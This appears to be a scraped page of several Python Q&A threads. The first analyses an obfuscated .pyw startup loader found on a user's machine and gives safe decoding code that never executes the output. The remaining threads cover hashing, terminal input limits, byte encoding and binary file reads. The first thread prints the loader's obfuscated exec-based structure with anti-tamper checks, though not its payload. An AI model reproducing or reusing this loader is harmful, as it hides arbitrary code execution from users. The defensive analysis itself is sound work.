Trying to understand this potentially virus encrypted pyw file

Today I noticed that this .pyw file had been added to my startup files.
I have already deleted it, but I would like to know what it may have done to my computer. It's sort of encrypted and I am not very familiar with Python, but since this is the source code, I assume there is no way to completely hide what it does.
Can someone either guide me through decoding it, or check it for me?
Edit: by the looks of it I can only post part of it here, but it should give a rough idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/

OBLIGATORY WARNING: The code is pretty obviously hiding something, and it will eventually build a string and exec it as a Python program, so it can do anything your user account can do on your computer. All of this is to say: DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii

# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
    decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
    # Each '/'-separated chunk is the hex form of UTF-8 encoded text.
    r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
    for x in r:
        if x == "ζ":
            # "ζ" stands in for a newline.
            print()
        else:
            # Undo the code point offset, then shift letters/digits one place right.
            x = chr(ord(x)-683867)
            if x in decode:
                x = decode[(decode.index(x) + 1) % len(decode)]
            print(x, end='')
The _sparkle string is a list of hex chunks separated by /. Each pair of hex digits in a chunk is one byte, and the bytes of a chunk are decoded as UTF-8; in the part you posted, every chunk yields a single character. The character ζ stands for a newline. For any other character, its numerical code point is taken, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if that character is a lowercase letter or a digit, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and digits increase by one, wrapping from 9 back to a (anything else is left unshifted). The result, presumably, forms a valid Python program.
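If you would rather inspect the result in an editor than watch it scroll past, here is a minimal sketch of the same decoding that returns the text instead of printing it. The names decode_payload, ALPHABET and OFFSET are made up for this example; the offset and alphabet are the ones visible in the posted script. Nothing in it executes the decoded text.

```python
import binascii

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
OFFSET = 683867  # magic number taken from the posted script


def decode_payload(data: str) -> str:
    """Return the decoded text as a string; nothing is executed."""
    out = []
    for token in data.split("/"):
        if not token:
            continue  # a trailing "/" leaves an empty chunk
        for ch in binascii.unhexlify(token).decode("utf-8"):
            if ch == "ζ":
                out.append("\n")  # ζ marks a line break
                continue
            ch = chr(ord(ch) - OFFSET)  # undo the code point offset
            if ch in ALPHABET:
                # shift one place right in the alphabet, wrapping at the end
                ch = ALPHABET[(ALPHABET.index(ch) + 1) % len(ALPHABET)]
            out.append(ch)
    return "".join(out)


# The first five chunks of the posted string
prefix = "ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/"
print(repr(decode_payload(prefix)))  # '\n# hi'
```

From there you could write the returned string to a .txt file and read it without any risk of running it.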
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

Related

What is the Python equivalent of Ruby's Base64.urlsafe_encode64(Digest::SHA256.hexdigest(STRING))

I am trying to port parts of a Ruby project to Python and cannot figure out the equivalent of Base64.urlsafe_encode64(Digest::SHA256.hexdigest(STRING)). The closest I have gotten is base64.urlsafe_b64encode(hashlib.sha256(STRING.encode('utf-8')).digest()). However, given the input StackOverflow, it returns b'HFqE4xhK0TPtcmK7rNQMl3bsQRnD-sNum5_K9vY1G98=' in Python and MWM1YTg0ZTMxODRhZDEzM2VkNzI2MmJiYWNkNDBjOTc3NmVjNDExOWMzZmFjMzZlOWI5ZmNhZjZmNjM1MWJkZg== in Ruby.
Full Python & Ruby Code:
Ruby
require "base64"
require "digest"
string= "StackOverflow"
output= Base64.urlsafe_encode64(Digest::SHA256.hexdigest(string))
puts output
Python
import hashlib
import base64
string = str("StackOverflow")
output = base64.urlsafe_b64encode(hashlib.sha256(string.encode('utf-8')).digest())
print(str(output))

In your original Python code you used digest instead of hexdigest, which gives a different result: digest returns the raw hash bytes, while hexdigest returns those bytes written out as a hexadecimal string. Keep in mind that porting code between languages can be difficult, as you need to understand both languages well enough to compare the code. Try to dissect the code piece by piece, splitting lines and printing the output at each stage to check what is happening.
Jamming everything into one line can be messy, and it makes it easy to overlook details that matter when tracking down a bug.
Write your code "spaced out" at first; you can collapse it into a single line later, although long one-liners are not very readable.
What you are looking for is:
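import hashlib
import base64
string = "StackOverflow"
# Hash first and keep the hexadecimal text, as Ruby's hexdigest does.
hex_digest = hashlib.sha256(string.encode('utf-8')).hexdigest()
# Base64-encode the hex text itself, not the raw hash bytes.
output = base64.urlsafe_b64encode(hex_digest.encode('utf-8'))
print(output.decode('utf-8'))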
It gives the same result as Base64.urlsafe_encode64(Digest::SHA256.hexdigest(string)) in Ruby.
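To see the difference at each stage, here is a small sketch that computes both variants side by side for the input from the question. The variable names are only for illustration.

```python
import base64
import hashlib

text = "StackOverflow"
sha = hashlib.sha256(text.encode("utf-8"))

raw = sha.digest()           # 32 raw bytes
hex_text = sha.hexdigest()   # the same hash as 64 hexadecimal characters (a str)

# Base64 of the raw bytes: what the original Python attempt produced
from_raw = base64.urlsafe_b64encode(raw).decode("ascii")
# Base64 of the hex text: what the Ruby code produces
from_hex = base64.urlsafe_b64encode(hex_text.encode("ascii")).decode("ascii")

print(len(raw), len(hex_text))  # 32 64
print(from_raw)
print(from_hex)
```

The second value is longer simply because it encodes 64 characters of hex text instead of 32 raw bytes.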

You need to use the hexdigest method instead of digest on the hash in Python to get the same output as in your Ruby example (since you use the hexdigest function there).
Also note that the hexdigest method returns a string instead of bytes, so you'll need to encode the result again (with .encode("utf-8")).
Here's a full example:
import hashlib
import base64
string = "StackOverflow"
output = base64.urlsafe_b64encode(hashlib.sha256(string.encode("utf-8")).hexdigest().encode("utf-8"))
print(output.decode("utf-8"))  # decode so the b'...' wrapper is not printed

Can we remove the input function's line length limit purely within Python? [duplicate]

I'm trying to input() a string containing a large paste of JSON.
(Why I'm pasting a large blob of json is outside the scope of my question, but please believe me when I say I have a not-completely-idiotic reason!)
However, input() only grabs the first 4095 characters of the paste, for reasons described in this answer.
My code looks roughly like this:
import json
foo = input()
json.loads(foo)
When I paste a blob of JSON that's longer than 4095 characters, json.loads(foo) raises an error. (The error varies based on the specifics of how the JSON gets cut off, but it invariably fails one way or another because it's missing the final }.)
I looked at the documentation for input(), and it made no mention of anything that looked useful for this issue. No flags to input in non-canonical mode, no alternate input()-style functions to handle larger inputs, etc.
Is there a way to be able to paste large inputs successfully? This would make my tool's workflow way less janky than having to paste into a file, save it somewhere, and then pass the file's location into the script.

Python has to follow the terminal's rules, but you could call stty from Python to change the terminal's behaviour and then change it back (Linux):
import json
import subprocess
subprocess.check_call(["stty", "-icanon"])  # leave canonical mode
try:
    result = json.loads(input())
finally:
    subprocess.check_call(["stty", "icanon"])  # always restore canonical mode
Alternatively, consider trying to get an indented JSON dump from your provider, so that no single line is too long, and read it line by line before decoding:
import json
import sys
data = "".join(sys.stdin.readlines())
result = json.loads(data)
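As a rough sketch of that second approach, the helper below reads everything up to end of input and parses it in one go. The name read_json is made up for this example, and it assumes the pasted JSON is split across lines and that the paste is ended with Ctrl-D on Linux. The demo uses an in-memory stream so it does not wait for keyboard input.

```python
import io
import json
import sys


def read_json(stream=sys.stdin):
    """Read the whole stream (until EOF) and parse it as JSON."""
    return json.loads(stream.read())


# Stand-in for a multi-line paste; in the real tool you would call read_json()
sample = io.StringIO('{\n  "name": "demo",\n  "items": [1, 2, 3]\n}\n')
print(read_json(sample))  # {'name': 'demo', 'items': [1, 2, 3]}
```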

What am I doing wrong with encoding hexadecimal "40" in Python?

I came across a binary file (I guess) that I am trying to generate with my script. Maybe I am doing it completely wrong, but so far it has worked. Now I'm stuck, and as a newcomer to binary files I can't name the problem well enough to search for an answer.
I read the "target file" as a binary file and found that it consists of many "\x00" bytes with a few numeric values in between (like "\x05").
What i do is like:
def myEncode(a):
    if a == 2: A = "\x02"
    elif a == 5: A = "\x05"
    return(A)
line = "\x00\x00\x01" + myEncode(5) + "\x00"
phrase = bytearray(line.encode("utf-8"))
f = open("outfile", "ab")
f.write(phrase)
f.close()
It would help me a lot if I could use hex() to transform the integer 5 into "\x05", but what I get is "0x5", which doesn't work when added to the file this way. I really need it to come out as "\x" followed by a two-digit number.
More importantly, I need to add decimal 128 (hexadecimal "\x80") and larger values. For a reason beyond my understanding, this always inserts "\xc2\x80". When I create the same file with the original program, it only adds "\x80", so I guess it must be possible somehow, yet I don't know how.
Thanks for any advice, hint or direction on where to look.
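One likely explanation, offered as a sketch rather than a confirmed diagnosis of the original program: "\x80" in a Python 3 str is the character U+0080, and UTF-8 encodes that character as the two bytes C2 80. Building the data from integers with bytes() avoids text encoding altogether. The helper name encode_values is made up for this example.

```python
def encode_values(values):
    """Turn integers in the range 0-255 into raw bytes, one byte per value."""
    return bytes(values)


# Encoding text as UTF-8 turns U+0080 into two bytes
print("\x80".encode("utf-8"))          # b'\xc2\x80'

# Building bytes from integers keeps one byte per value
print(encode_values([0, 0, 1, 5, 0]))  # b'\x00\x00\x01\x05\x00'
print(encode_values([0x40, 0x80]))     # b'@\x80'
```

The result can be passed straight to f.write() on a file opened in "ab" mode. Note that 0x40 shows up as @ when printed because that byte happens to be the ASCII code for @; the byte written to the file is still 0x40.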

File read reaches end of file unexpectedly

I'm translating a script from matlab, which reads a file of binary-encoded 32-bit integers and parses them appropriately. I have written the following method that is intended to mimic matlab's fread() function:
def readi(f,n):
    x = zeros(n,int);
    for i in range(0,n):
        x[i] = struct.unpack('i',f.read(4))[0];
        print x[i];
    return x;
I call this function variously with n between 1 and 9 in my script as I parse out the data. My problem is that the script only gets part of the way into the file before I get this error:
x[i] = struct.unpack('i',f.read(4))[0];
struct.error: unpack requires a string argument of length 4
It appears that python thinks I have reached the end of the file. The point in execution where the error occurs is a line in a loop that has already been iterated over several times. In addition, the small portion of the file that has been parsed already matches exactly what my matlab script produces from the exact same file (not a copy). Matlab, however, is able to read a much larger dataset from the file. Does anyone have ideas on why this error is occurring?

In my own testing, whether the file was opened in binary-mode or not (surprisingly) didn't matter. The only thing I can suggest is to make sure you understand the format of the input file exactly. So in addition to reading the matlab script, it might be a good idea to look at hex dump of the file where you can see the individual bytes of raw data and be able to verify whether it matches your understanding of the layout of its contents.
Besides all that, you could try the following simplification/optimization of your readi() function, which does not require the temporary x list and reads the bytes of all the integers in the group with one call to file.read():
import struct

def readi(f, n):
    fmt = '%di' % n  # e.g. '3i' for three native ints
    return struct.unpack(fmt, f.read(struct.calcsize(fmt)))
However, I don't think it will solve your problem, because it should be equivalent to what you are already doing, return value-wise anyway (it doesn't print anything like yours does).
One final note -- you don't need to end your lines of code with a semicolon. Python isn't like C and several other languages in that respect.
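To help pin down where the read comes up short, here is a hedged variant of readi() that checks how many bytes it actually got before unpacking. It is written in Python 3 syntax, unlike the Python 2 code in the question, and it assumes the file object was opened in binary mode ("rb"). The EOFError message format is just a choice made for this sketch.

```python
import io
import struct


def readi(f, n):
    """Read n native ints from binary file object f; raise EOFError on a short read."""
    fmt = "%di" % n
    size = struct.calcsize(fmt)
    data = f.read(size)
    if len(data) != size:
        # Report how much was really available instead of failing inside unpack
        raise EOFError("wanted %d bytes, got %d" % (size, len(data)))
    return struct.unpack(fmt, data)


# In-memory stand-in for the data file: three packed integers
demo = io.BytesIO(struct.pack("3i", 1, 2, 3))
print(readi(demo, 2))  # (1, 2)
```

Calling readi(demo, 2) a second time would raise EOFError, because only one integer is left in the stream.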

Trying to pass a number of bytes to read() via raw_input

I'm doing some extra credit for Zed Shaw's "Learn Python The Hard Way"; the extra credit for exercise 15 tells you to read through pydoc file to find other things I could do with files. I was interested in figuring out how to have the terminal print out a certain number of bytes of a text file using read(). I can hard-code the argument for how many bytes to read, but I hit a wall when trying to prompt the user to define the number of bytes.
Here's the script as I have it so far:
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's 24 bytes of your file %r:" % filename
print txt.read(24)
print """What about an arbitrary, not hard-coded number of bytes? Enter the number
of bytes you want read out of the txt file at this prompt, as an integer:"""
how_far = raw_input("> ")
print txt.read(how_far2) # this format makes sense in my head but obviously isn't the done thing.
terminal spits out the error:
"NameError: name 'how_far2' is not defined"
How do I prompt the user of the script to type in a number of bytes, and have the script read out that number of bytes?
BONUS QUESTIONS:
What is the actual-factual term for what I'm trying to do here? Pass a variable to a method? Pass a variable to a function?
Is the number of bytes an argument of read? Is that the correct term?
More generally, what's a good place to get a vocabulary list of python terms? Any other books Stack Overflow would recommend, or some in online documentation somewhere? Really looking for a no assumptions, no prior knowledge, "explain it to me like I'm five" level of granularity... a half hour of web-searching hasn't helped too much. I've not found terminology really collected together into any one place online despite a good amount of effort searching the web.

The error message is because you have used how_far in one place and how_far2 in the other.
You'll also need to convert how_far to an int before passing it to read, for example with int(how_far).
You will find it can be called passing a variable, a parameter or an argument. These are not Python terms; they are general programming terms.

raw_input returns a string. file.read expects an integer -- likely you just need to convert the output from raw_input into an integer before you use it.
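A minimal sketch of that conversion, written for Python 3 (where raw_input is called input). The function name read_prefix is made up for this example; it takes the typed text as a parameter so the demo can run without a prompt, and it opens the file in binary mode so the count really is a number of bytes.

```python
import os
import tempfile


def read_prefix(path, count_text):
    """Convert the typed text to an int and return that many bytes of the file."""
    count = int(count_text)  # raises ValueError if the text is not a whole number
    with open(path, "rb") as f:
        return f.read(count)


# Demo on a throwaway file; in the script, count_text would come from input("> ")
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"hello world")
print(read_prefix(tmp.name, "5"))  # b'hello'
os.remove(tmp.name)
```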
